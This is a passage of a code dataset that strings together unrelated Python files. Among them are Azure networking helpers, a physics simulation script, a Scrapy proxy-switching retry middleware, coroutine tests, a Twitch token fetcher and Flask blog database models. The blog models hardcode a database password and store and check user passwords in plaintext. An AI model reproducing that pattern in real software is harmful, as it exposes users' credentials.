resource_group_name=resource_group\n )\n pub_ip.wait()\n result = True\n except CloudError as exc:\n await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n\n return result\n\n\nasync def get(hub, name, resource_group, **kwargs):\n '''\n .. versionadded:: 1.0.0\n\n Get details about a specific public IP address.\n\n :param name: The name of the public IP address to query.\n\n :param resource_group: The resource group name assigned to the\n public IP address.\n\n CLI Example:\n\n .. code-block:: bash\n\n azurerm.network.public_ip_address.get test-pub-ip testgroup\n\n '''\n expand = kwargs.get('expand')\n\n netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n\n try:\n pub_ip = netconn.public_ip_addresses.get(\n public_ip_address_name=name,\n resource_group_name=resource_group,\n expand=expand\n )\n result = pub_ip.as_dict()\n except CloudError as exc:\n await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n result = {'error': str(exc)}\n\n return result\n\n\nasync def create_or_update(hub, name, resource_group, **kwargs):\n '''\n .. versionadded:: 1.0.0\n\n Create or update a public IP address within a specified resource group.\n\n :param name: The name of the public IP address to create.\n\n :param resource_group: The resource group name assigned to the\n public IP address.\n\n CLI Example:\n\n .. code-block:: bash\n\n azurerm.network.public_ip_address.create_or_update test-ip-0 testgroup\n\n '''\n if 'location' not in kwargs:\n rg_props = await hub.exec.azurerm.resource.group.get(\n resource_group, **kwargs\n )\n\n if 'error' in rg_props:\n log.error(\n 'Unable to determine location from resource group specified.'\n )\n return False\n kwargs['location'] = rg_props['location']\n\n netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n\n try:\n pub_ip_model = await hub.exec.utils.azurerm.create_object_model('network', 'PublicIPAddress', **kwargs)\n except TypeError as exc:\n result = {'error': 'The object model could not be built. ({0})'.format(str(exc))}\n return result\n\n try:\n ip = netconn.public_ip_addresses.create_or_update(\n resource_group_name=resource_group,\n public_ip_address_name=name,\n parameters=pub_ip_model\n )\n ip.wait()\n ip_result = ip.result()\n result = ip_result.as_dict()\n except CloudError as exc:\n await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n result = {'error': str(exc)}\n except SerializationError as exc:\n result = {'error': 'The object model could not be parsed. ({0})'.format(str(exc))}\n\n return result\n\n\nasync def list_all(hub, **kwargs):\n '''\n .. versionadded:: 1.0.0\n\n List all public IP addresses within a subscription.\n\n CLI Example:\n\n .. code-block:: bash\n\n azurerm.network.public_ip_address.list_all\n\n '''\n result = {}\n netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n try:\n pub_ips = await hub.exec.utils.azurerm.paged_object_to_list(netconn.public_ip_addresses.list_all())\n\n for ip in pub_ips:\n result[ip['name']] = ip\n except CloudError as exc:\n await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n result = {'error': str(exc)}\n\n return result\n\n\nasync def list_(hub, resource_group, **kwargs):\n '''\n .. versionadded:: 1.0.0\n\n List all public IP addresses within a resource group.\n\n :param resource_group: The resource group name to list public IP\n addresses within.\n\n CLI Example:\n\n .. code-block:: bash\n\n azurerm.network.public_ip_address.list testgroup\n\n '''\n result = {}\n netconn = await hub.exec.utils.azurerm.get_client('network', **kwargs)\n try:\n pub_ips = await hub.exec.utils.azurerm.paged_object_to_list(\n netconn.public_ip_addresses.list(\n resource_group_name=resource_group\n )\n )\n\n for ip in pub_ips:\n result[ip['name']] = ip\n except CloudError as exc:\n await hub.exec.utils.azurerm.log_cloud_error('network', str(exc), **kwargs)\n result = {'error': str(exc)}\n\n return result\n","sub_path":"idem_provider_azurerm/exec/azurerm/network/public_ip_address.py","file_name":"public_ip_address.py","file_ext":"py","file_size_in_byte":7325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"224754328","text":"import pyalps\nimport matplotlib.pyplot as plt\nimport pyalps.plot\nimport numpy as np\n\n#prepare the input parameters\nparms = []\nfor l in [20,40,60,80,100]:\n for h in np.linspace(0.0,5.0,51):\n parms.append(\n { \n 'LATTICE' : \"chain lattice\", \n 'MODEL' : \"spin\",\n 'local_S' : 0.5,\n 'T' : 0.08,\n 'J' : 1 ,\n 'THERMALIZATION' : 10000,\n 'SWEEPS' : 100000,\n 'L' : l,\n 'h' : h\n }\n )\n\n#write the input file and run the simulation\ninput_file = pyalps.writeInputFiles('parmHmag',parms)\nres = pyalps.runApplication('dirloop_sse',input_file,Tmin=5)\n\n#load the magnetization and collect it as function of field h\ndata = pyalps.loadMeasurements(pyalps.getResultFiles(prefix='parmHmag'),'Magnetization Density')\nmagnetization = pyalps.collectXY(data,x='h',y='Magnetization Density')\n\n#make plot\nplt.figure()\npyalps.plot.plot(magnetization)\nplt.xlabel('$h$')\nplt.ylabel('Magnetizacija')\nplt.ylim(0.0,0.6)\nplt.title('Kvantni Hajzenbergov lanac (Quantum Heisenberg chain)')\nplt.savefig(\"magnetization_heisenberg_chain.eps\",dpi=300)\n","sub_path":"Magnetization_curves_of_quantum_spin_models/magnetization_heisenberg_chain.py","file_name":"magnetization_heisenberg_chain.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"184009380","text":"from logging import Logger, getLogger\nfrom typing import Optional, Union\n\nfrom scrapy.downloadermiddlewares.retry import RetryMiddleware\nfrom scrapy.http import Response\nfrom scrapy.http.request import Request\nfrom scrapy.spiders import Spider\nfrom scrapy.utils.python import global_object_name\nfrom scrapy.utils.response import response_status_message\n\nfrom .constants import Base as Constants\nfrom .db import db\nfrom .utils import (\n build_proxycrawl,\n build_proxycrawl_js,\n get_url_from_proxycrawl,\n)\n\nlogger = getLogger(__name__)\n\n\ndef get_retry_request(\n request: Request,\n spider: Spider,\n reason: Union[str, Exception] = \"unspecified\",\n response: Response = None,\n max_retry_times: Optional[int] = None,\n priority_adjust: Optional[int] = None,\n logger: Logger = logger,\n stats_base_key: str = \"retry\",\n):\n \"\"\"\n Returns a new :class:`~scrapy.Request` object to retry the specified\n request, or ``None`` if retries of the specified request have been\n exhausted.\n For example, in a :class:`~scrapy.Spider` callback, you could use it as\n follows::\n def parse(self, response):\n if not response.text:\n new_request_or_none = get_retry_request(\n response.request,\n spider=self,\n reason='empty',\n )\n return new_request_or_none\n\n *spider* is the :class:`~scrapy.Spider` instance which is asking for the\n retry request. It is used to access the :ref:`settings `\n and :ref:`stats `, and to provide extra logging context (see\n :func:`logging.debug`).\n\n *reason* is a string or an :class:`Exception` object that indicates the\n reason why the request needs to be retried. It is used to name retry stats.\n\n *max_retry_times* is a number that determines the maximum number of times\n that *request* can be retried. If not specified or ``None``, the number is\n read from the :reqmeta:`max_retry_times` meta key of the request. If the\n :reqmeta:`max_retry_times` meta key is not defined or ``None``, the number\n is read from the :setting:`RETRY_TIMES` setting.\n\n *priority_adjust* is a number that determines how the priority of the new\n request changes in relation to *request*. If not specified, the number is\n read from the :setting:`RETRY_PRIORITY_ADJUST` setting.\n\n *logger* is the logging.Logger object to be used when logging messages\n\n *stats_base_key* is a string to be used as the base key for the\n retry-related job stats\n\n \"\"\"\n settings = spider.crawler.settings\n stats = spider.crawler.stats\n retry_times = request.meta.get(\"retry_times\", 0) + 1\n\n crawlera = request.meta.get(\"crawlera\")\n proxycrawl = request.meta.get(\"proxycrawl\")\n proxycrawl_js = request.meta.get(\"proxycrawl_js\")\n proxycrawl_js_enabled = request.meta.get(\"proxycrawl_js_enabled\", False)\n\n crawlera_error = None\n response_status_code = None\n\n page_name = request.meta.get(\"page_name\", \"unknown_page\")\n\n if response:\n response_status_code = response.status\n crawlera_error = response.headers.get(\"X-Crawlera-Error\")\n crawlera_error = crawlera_error.decode(\"utf-8\") if crawlera_error else None\n\n proxy_provider = \"crawlera\"\n if \"proxycrawl\" in request.url:\n proxy_provider = \"proxycrawl\"\n\n if not (crawlera and proxycrawl and proxycrawl_js):\n raise NoProxyCredentials(\"crawlera, proxycrawl, and proxycrawl_js API Key is required\")\n\n if max_retry_times is None:\n max_retry_times = request.meta.get(\"max_retry_times\", 1)\n if max_retry_times is None:\n max_retry_times = int(settings.getint(\"RETRY_TIMES\"))\n\n if proxy_provider == \"crawlera\":\n key = f\"{Constants.CRAWLERA_ERROR}\"\n stats.inc_value(key)\n if crawlera_error:\n key += f\"/{crawlera_error}\"\n stats.inc_value(key)\n\n key = f\"{Constants.CRAWLERA_ERROR}/{response_status_code}\"\n stats.inc_value(key)\n if crawlera_error:\n key += f\"/{crawlera_error}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.CRAWLERA_ERROR}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}\"\n stats.inc_value(key)\n if crawlera_error:\n key += f\"/{crawlera_error}\"\n stats.inc_value(key)\n\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}/{response_status_code}\"\n stats.inc_value(key)\n if crawlera_error:\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}/{crawlera_error}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.CRAWLERA_ERROR}/{page_name}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n elif proxy_provider == \"proxycrawl\":\n key = f\"{Constants.PROXYCRAWL_ERROR}\"\n stats.inc_value(key)\n\n key = f\"{Constants.PROXYCRAWL_ERROR}/{response_status_code}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.PROXYCRAWL_ERROR}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n key = f\"{Constants.PROXYCRAWL_ERROR}/{page_name}/{response_status_code}\"\n stats.inc_value(key)\n\n if response_status_code:\n key = f\"{Constants.PROXYCRAWL_ERROR}/{page_name}/{response_status_code}/{reason}\"\n stats.inc_value(key)\n\n if retry_times <= max_retry_times:\n new_request = request.copy()\n new_request.meta[\"retry_times\"] = retry_times\n new_request.dont_filter = True\n if priority_adjust is None:\n priority_adjust = settings.getint(\"RETRY_PRIORITY_ADJUST\")\n new_request.priority = request.priority + priority_adjust # type: ignore\n\n if callable(reason):\n reason = reason()\n if isinstance(reason, Exception):\n reason = global_object_name(reason.__class__)\n\n stats.inc_value(f\"{stats_base_key}/count\")\n stats.inc_value(f\"{stats_base_key}/reason_count/{reason}\")\n\n if retry_times == 1:\n if proxy_provider == \"crawlera\":\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - \"\n f\"using {proxy_provider}(X-Crawlera-Error = {crawlera_error}): {reason}\",\n extra={\"spider\": spider},\n )\n else:\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - using {proxy_provider}: {reason}\",\n extra={\"spider\": spider},\n )\n else:\n # Switch proxy provider\n if \"proxycrawl\" in request.url:\n new_request.meta[\"proxy\"] = crawlera\n new_url = get_url_from_proxycrawl(request.url)\n new_request = new_request.replace(url=new_url)\n\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - switch proxycrawl to crawlera: {reason}\",\n extra={\"spider\": spider},\n )\n else:\n new_request.meta[\"proxy\"] = None\n\n if proxycrawl_js_enabled:\n new_url = build_proxycrawl_js(request.url, proxycrawl_js)\n new_request = new_request.replace(url=new_url)\n else:\n new_url = build_proxycrawl(request.url, proxycrawl)\n new_request = new_request.replace(url=new_url)\n\n logger.debug(\n f\"Retrying {request} (failed {retry_times} times) - \"\n f\"using {proxy_provider}(X-Crawlera-Error = {crawlera_error}): {reason}\",\n extra={\"spider\": spider},\n )\n\n return new_request\n else:\n update_on_fail = request.meta.get(\"update_on_fail\")\n if update_on_fail:\n key_name = update_on_fail[\"key\"]\n key_value = update_on_fail[key_name]\n update_values = update_on_fail[\"update_values\"]\n\n collection = db[update_on_fail[\"collection\"]]\n collection.update_one({key_name: key_value}, {\"$set\": update_values})\n\n stats.inc_value(f\"{stats_base_key}/max_reached\")\n\n if proxy_provider == \"crawlera\":\n logger.debug(\n f\"Gave up retrying {request} (failed {retry_times} times) - \"\n f\"using {proxy_provider}(X-Crawlera-Error = {crawlera_error}): {reason}\",\n extra={\"spider\": spider},\n )\n else:\n logger.debug(\n f\"Gave up retrying {request} (failed {retry_times} times) - using {proxy_provider}: {reason}\",\n extra={\"spider\": spider},\n )\n\n return None\n\n\nclass CustomRetryMiddleware(RetryMiddleware):\n def process_response(self, request, response, spider):\n if request.meta.get(\"dont_retry\", False):\n return response\n if response.status in self.retry_http_codes:\n reason = response_status_message(response.status)\n return self._retry(request, reason, spider, response) or response\n return response\n\n def _retry(self, request, reason, spider, response=None):\n max_retry_times = request.meta.get(\"max_retry_times\", self.max_retry_times)\n priority_adjust = request.meta.get(\"priority_adjust\", self.priority_adjust)\n return get_retry_request(\n request=request,\n spider=spider,\n reason=reason,\n response=response,\n max_retry_times=max_retry_times,\n priority_adjust=priority_adjust,\n )\n\n\nclass NoProxyCredentials(Exception):\n pass\n","sub_path":"scrapy_project/build/lib/project/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"3277761","text":"lol = [[0]*3]*3\nprint(lol)\nfir, sec, thr = lol\nfir[0] = 1\nsec[1] = 2\nthr[2] = 3\nprint(lol)\n\n\n# old_print = print\n# print_fd = open(...)\n# def print(*args, *kwargs):\n# if 'file' in kwargs: return old_print(*args, **kwargs)\n# else: return old_print(*args, file=print_fd, **kwargs)\n#\n# Направит все принты в указанный файл, если параметр file не указан.\n# Иными словами это весь вывод скрипта направит в файл","sub_path":"lesson_05/lol.py","file_name":"lol.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"244856129","text":"import unittest\nfrom . import tools\nfrom .decorators import invertibleGenerator, coroutine\nfrom nose.tools import assert_equal\nfrom nose_parameterized import parameterized\n\n\n@invertibleGenerator\ndef genAfterLoop(iterable):\n\n for val in iterable:\n yield val\n\n yield 42\n\n\n@invertibleGenerator\ndef genBeforeLoop(iterable):\n\n yield 42\n\n for val in iterable:\n yield val\n\n\n@invertibleGenerator\ndef genTwoLoops(iterable):\n\n for val in iterable:\n if val == \"break\":\n yield \"break from first\"\n break\n yield \"first: \" + str(val)\n\n yield \"between loops\"\n\n for val in iterable:\n if val == \"break\":\n yield \"break from second\"\n break\n yield \"second \" + str(val)\n\n yield \"done\"\n\n\n@coroutine\ndef coTwoLoops(target):\n notDone = True\n\n try:\n while notDone:\n val = (yield)\n if val == \"break\":\n target.send(\"break from first\")\n break\n target.send(\"first: \" + str(val))\n except GeneratorExit:\n notDone = False\n\n target.send(\"between loops\")\n\n try:\n while notDone:\n val = (yield)\n if val == \"break\":\n target.send(\"break from second\")\n break\n target.send(\"second \" + str(val))\n except GeneratorExit:\n notDone = False\n\n target.send(\"done\")\n\n\nclass DummyCoroutine(object):\n \"\"\" A dummy \"sink\" coroutine that records all values sent to it. \"\"\"\n\n def __init__(self):\n self.results = []\n self.closed = False\n self.resultsAfterClose = []\n\n def send(self, val):\n if self.closed:\n self.resultsAfterClose.append(val)\n else:\n self.results.append(val)\n\n def close(self):\n self.closed = True\n\n\ndef runCoroutinePipeline(pipeline, iterable):\n\n dummy = DummyCoroutine()\n tools.pushFromIterable(iterable, pipeline(dummy))\n\n return dummy.results\n\n\ndef runGeneratorPipeline(pipeline, iterable):\n results = [val for val in pipeline(iterable)]\n return results\n\n\ndef assertEqualPipelines(genPipeline, coPipeline, iterable):\n\n cachedIterable = list(iterable)\n assert_equal(runGeneratorPipeline(genPipeline, cachedIterable.__iter__()),\n runCoroutinePipeline(coPipeline, cachedIterable))\n\n\nclass TestEquivalence(unittest.TestCase):\n\n testParameters = [\n (\"empty\", []),\n (\"one\", [1]),\n (\"odd list\", [1, 2, 3, 4, 5]),\n (\"even list\", [1, 2, 3, 4, 5, 6]),\n ]\n\n @parameterized.expand(testParameters)\n def test_passthrough(self, _, l):\n assertEqualPipelines(\n tools.genPassthrough, tools.genPassthrough.co, l)\n\n @parameterized.expand(testParameters)\n def test_pair(self, _, l):\n assertEqualPipelines(\n tools.genPairs,\n tools.genPairs.co, l)\n\n @parameterized.expand(testParameters)\n def test_filter(self, _, l):\n iseven = lambda x: x % 2 == 0\n\n assertEqualPipelines(\n lambda i: tools.genFilter(iseven, i),\n lambda i: tools.genFilter.co(iseven, i),\n l)\n\n @parameterized.expand(testParameters)\n def test_after_loop(self, _, l):\n assertEqualPipelines(\n genAfterLoop,\n genAfterLoop.co, l)\n\n @parameterized.expand(testParameters)\n def test_before_loop(self, _, l):\n assertEqualPipelines(\n genBeforeLoop,\n genBeforeLoop.co, l)\n\n @parameterized.expand(\n testParameters + [\n (\"one break\", [\"break\"]),\n (\"val + one break\", [1, \"break\"]),\n (\"vals + one break\", [1, 2, \"break\"]),\n (\"one break + val\", [\"break\", 1]),\n (\"one break + vals\", [\"break\", 1, 2]),\n (\"two breaks\", [\"break\", \"break\"]),\n (\"vals + two breaks\", [1, 2, \"break\", \"break\"]),\n (\"two breaks + vals\", [\"break\", \"break\", 1, 2]),\n (\"break + vals + break\", [\"break\", 1, 2, \"break\"]),\n (\"vals + two break + vals\", [1, 2, \"break\", 3, 4, \"break\", 5, 6]),\n ])\n def test_two_loops(self, _, l):\n assertEqualPipelines(\n genTwoLoops,\n genTwoLoops.co, l)\n","sub_path":"generators_to_coroutines/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"467597970","text":"from urllib import request, parse\nimport requests\nfrom oauthlib.oauth2 import BackendApplicationClient\nimport requests_oauthlib\nimport json\n\nurl = 'https://id.twitch.tv/oauth2/token'\nclient_credentials = json.loads(open('twitch_secret.json').read())\n#\n#\n# client = BackendApplicationClient(client_credentials['secret']['id'])\n# oauth_object = requests_oauthlib.OAuth2Session(client=client)\n# token = oauth_object.fetch_token(token_url=url,\n# client_id=client_credentials['secret']['id'],\n# client_secret=client_credentials['secret']['secret'])\n# access_token = token['access_token']\n\n# my_request = requests.get(url, params={\n# 'client_id': client_credentials['secret']['id'],\n# 'redirect_uri': 'http://localhost',\n# 'client_secret': client_credentials['secret']['secret'],\n# 'grant_type': 'client_credentials'\n# # 'response_type': 'code'\n# })\n\nmy_response = requests.post(url, data={\n 'client_id': client_credentials['secret']['id'],\n 'redirect_uri': 'http://localhost',\n 'client_secret': client_credentials['secret']['secret'],\n 'grant_type': 'client_credentials'\n }\n)\n\nprint(my_response.text)\n\ncredentials_response = json.loads(my_response.text)\n\nwith open('acquired_token.txt', 'w') as in_file:\n in_file.write(credentials_response['access_token'])","sub_path":"get_token.py","file_name":"get_token.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"67558604","text":"#!/usr/bin/python\n# -*-coding: utf-8 -*-\n\nimport math\n\n\ndef primelocation(n):\n if n < 2:\n return 1\n count = 1\n j = 3\n while True:\n if isprime(j):\n count += 1\n if count == n:\n return j\n j += 2\n\n\ndef isprime(number):\n for i in range(2, int(math.sqrt(number))+1):\n if number % i == 0:\n return False\n return True\n\n\nprimelocation(10001)\n","sub_path":"Project-Euler/src/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"467760727","text":"import gevent\nimport gevent.monkey\nimport time\nimport datetime\ngevent.monkey.patch_all()\n\n\ndef _thread_one():\n while True:\n print(1)\n start = time.time()\n gevent.sleep(3)\n # print(\"{} {}\".format('one', time.time() - start))\n print(\"{} {}\".format('one', datetime.datetime.now()))\n\n\ndef _thread_two():\n while True:\n print(2)\n start = time.time()\n gevent.sleep(4)\n # print(\"{} {}\".format('two', time.time() - start))\n print(\"{} {}\".format('two', datetime.datetime.now()))\n\n\ndef _thread_three():\n while True:\n print(3)\n start = time.time()\n gevent.sleep(5)\n # print(\"{} {}\".format('three', time.time() - start))\n print(\"{} {}\".format('three', datetime.datetime.now()))\n\n\ndef main():\n # 三个协程\n thread_list = [_thread_one, _thread_two, _thread_three]\n spawns = []\n for t in thread_list:\n spawns += [gevent.spawn(t)]\n\n gevent.joinall(spawns)\n\n\ndef all_in_one():\n # 一个协程\n while True:\n _thread_one()\n _thread_three()\n _thread_three()\n gevent.sleep(3)\n\n\ndef main_all_in_one():\n gevent.joinall([gevent.spawn(all_in_one)])\n\n\nif __name__ == '__main__':\n main()\n# main_all_in_one()\n","sub_path":"Gevent/gevent_threads.py","file_name":"gevent_threads.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"441973999","text":"import pymysql\nimport sys\n\nINSERTUSER = 'INSERT INTO user(_name, _password,_github,_wechat,_info,_create,_access) VALUES(%s, %s, %s, %s, %s, %s, %s)'\nUPDATEUSER='UPDATE user SET _password=%s,_github=%s,_wechat=%s,_info=%s WHERE _id=%s'\nSEARCHUSER = \"SELECT * FROM user WHERE _name=%s\"\nDELETEUSER='DELETE FROM user WHERE _id=%s'\nSEARCHUSERBYID='SELECT * FROM user WHERE _id=%s'\nSEARCHALLUSER='SELECT * FROM user'\n\nINSERTARTICLE='INSERT INTO articles(_img,_subtitle,_author,_create,_update,_title,_content,_class,_counts) VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)'\nSEARCHCLASSARTICLES='SELECT * FROM articles WHERE _class = %s '\nSEARCHONEARTICLE='SELECT * FROM articles WHERE _id=%s '\nUPDATEARTICLE='UPDATE articles SET _img=%s,_subtitle=%s, _author=%s,_update=%s,_title=%s, _content=%s, _class=%s WHERE _id=%s'\nCOUNTARTICLE='UPDATE articles SET _counts=_counts+1 WHERE _id=%s'\nDELETEARTICLE='DELETE FROM ariticles WHERE _id=%s'\nSEARCHALLARTICLE='SELECT * FROM articles'\n\nINSERTCOMMENT='INSERT INTO comment(_name,_content,_create,_fatherid,_sonid,_for) VALUES(%s,%s,%s,%s,%s,%s)'\nSEARCHSONCOMMENT='SELECT * FROM comment WHERE _fatherid=%s'\nSEARCHONECOMMENT='SELECT * FROM comment WHERE _sonid=%s'\nDELETECOMMENT='DELETE FROM comment WHERE _id=%s'\nCOUNTCOMMENT='UPDATE comment SET _for=_for+1 WHERE _id=%s'\nSEARCHALLCOMMENT='SELECT * FROM comment'\n\nreload(sys)\nsys.setdefaultencoding(\"utf8\")\n\ndef init_mysql():\n conn = pymysql.connect(host = \"127.0.0.1\", port = 3306, user = \"root\", password = \"yuliang\", db = \"blog2017\", charset = \"utf8\")\n return conn\n\nclass user():\n \"\"\"docstring for .\"\"\"\n def create(self,**data):\n print(data)\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHUSER,data['name'])\n sta = cursor.fetchone()\n print(sta)\n print('status:'+str(sta=='None'))\n if str(sta)=='None':\n sta=cursor.execute(INSERTUSER,(data['name'],data['password'],data['github'],data['wechat'],data['info'],data['create'],0))\n print(sta)\n conn.commit()\n conn.close()\n return {'status':'success','code':sta}\n else:\n print(sta)\n conn.commit()\n conn.close()\n return {'status':'error','info':'invalid username'}\n\n\n def delete(self,id):\n conn = init_mysql()\n cursor = conn.cursor()\n sta = cursor.execute(DELETEUSER,(int(id)))\n conn.commit()\n conn.close()\n return sta;\n\n def login(self,name,password):\n conn = init_mysql()\n cursor = conn.cursor()\n print('>>> n3 = %s' % name)\n print('>>> n4 = %s' % password)\n cursor.execute(SEARCHUSER,name)\n data = cursor.fetchone()\n if str(data)=='None':\n conn.commit()\n conn.close()\n return {'status':404}\n else :\n if data[2] == password:\n conn.commit()\n conn.close()\n return {'status':200,'id':data[0],'access':data[6]}\n else :\n conn.commit()\n conn.close()\n return {'status':202}\n\n def update(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta = cursor.execute(UPDATEUSER,\n (data['password'],data['github'],data['wechat'],data['info'],data['id']))\n conn.commit()\n conn.close()\n return sta\n\n def getinfo(self,name):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHUSER,(name))\n data=cursor.fetchone()\n conn.commit()\n conn.close()\n return data\n\n def getaccess(self,name):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHUSERBYID,name)\n data=cursor.fetchone()\n conn.commit()\n conn.close()\n return data[7]\n\n def serach_all(self):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHALLUSER,())\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n\nclass articles():\n \"\"\"docstring for .\"\"\"\n def create(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(INSERTARTICLE,\n (data['img'],data['subtitle'],data['author'],data['create'],data['update'],data['title'],data['content'],data['class'],data['counts']))\n conn.commit()\n conn.close()\n return sta\n\n def count(self,id):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(COUNTARTICLE,(id))\n conn.commit()\n conn.close()\n return sta\n\n def delete(self,id):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(DELETEARTICLE,(id))\n conn.commit()\n conn.close()\n return sta\n\n def search_one(self,id):\n #:get one article\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHONEARTICLE,(id))\n data=cursor.fetchone()\n conn.commit()\n conn.close()\n return data\n\n def serach_muti(self,data):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHCLASSARTICLES,(data))\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n\n def serach_all(self):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHALLARTICLE,())\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n\n def update(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(UPDATEARTICLE,(data['img'],data['subtitle'],data['author'],data['update'],data['title'],data['content'],data['class'],data['id']))\n conn.commit()\n conn.close()\n return sta\n\nclass comment():\n \"\"\"docstring for .\"\"\"\n def create(self,**data):\n conn = init_mysql()\n cursor = conn.cursor()\n sta=cursor.execute(INSERTCOMMENT,(data['name'],data['content'],data['create'],data['fatherid'],data['sonid'],data['for']))\n conn.commit()\n conn.close()\n return sta\n\n def search_son(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n cursor.execute(SEARCHSONCOMMENT,(id))\n data = cursor.fetchall()\n conn.commit()\n conn.close()\n return data\n\n def search_article(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n cursor.execute(SEARCHONECOMMENT,(id))\n data = cursor.fetchall()\n conn.commit()\n conn.close()\n return data\n\n def delete(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n status=cursor.execute(DELETECOMMENT,(id))\n conn.commit()\n conn.close()\n return status\n\n def count(self,id):\n conn=init_mysql()\n cursor=conn.cursor()\n status=cursor.execute(COUNTCOMMENT,(id))\n conn.commit()\n conn.close()\n return status\n\n def serach_all(self):\n conn = init_mysql()\n cursor = conn.cursor()\n cursor.execute(SEARCHALLCOMMENT,())\n datas=cursor.fetchall()\n conn.commit()\n conn.close()\n return datas\n","sub_path":"flask/app/Blogmodel.py","file_name":"Blogmodel.py","file_ext":"py","file_size_in_byte":7313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"178063575","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nimport os\nAUTHOR = 'Will Sorenson'\nSITENAME = 'Analytical Sense'\nSITEURL = 'http://localhost:8000'\n\nPATH = 'content'\nNOTEBOOK_DIR = 'notebooks'\nEXTRA_HEADER = open('_nb_header.html').read().decode('utf-8')\n\nTIMEZONE = 'Europe/Paris'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'))\n\n\nDEFAULT_PAGINATION = 5\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\nTHEME = '/Users/Will/Devel/pelican-bootstrap3'\n\nGITHUB_USER ='Will-So'\nGITHUB_SKIP_FORK = True\n\n#SOCIAL = (('github', 'http://github.com/Will-So')) # Gives an error for some reason\n\n#DIRECT_TEMPLATES = ('index', 'categories', 'authors', 'archives', 'search')\n\nTAG_CLOUD_MAX_ITEMS = 10\n\nDISPLAY_CATEGORIES_ON_MENU = False\n\nDISPLAY_TAGS_ON_SIDEBAR = True\n\n# PLUGIN_PATHS = [os.path.join(os.environ.get('HOME'),\n# 'Devel/2_tech_blog/pelican-plugins')]\n\nPLUGIN_PATHS = [os.path.join(os.environ.get('HOME'),\n 'Devel/2_tech_blog/pelican-plugins')]\n\nPLUGINS = ['liquid_tags.img', 'liquid_tags.video',\n 'liquid_tags.youtube', 'liquid_tags.vimeo',\n 'liquid_tags.include_code', 'tipue_search',\n 'liquid_tags.notebook']\n\n\n\n#DISQUS_SITENAME = 'analyticalsense'","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"381734123","text":"\n#NEEDE IMPORTS\n#######################################################################################################################################\nimport torch\nimport time\nimport cv2\nimport numpy as np\nimport mediapipe as mp\nfrom statistics import mode\nimport handtracking as hd\nimport 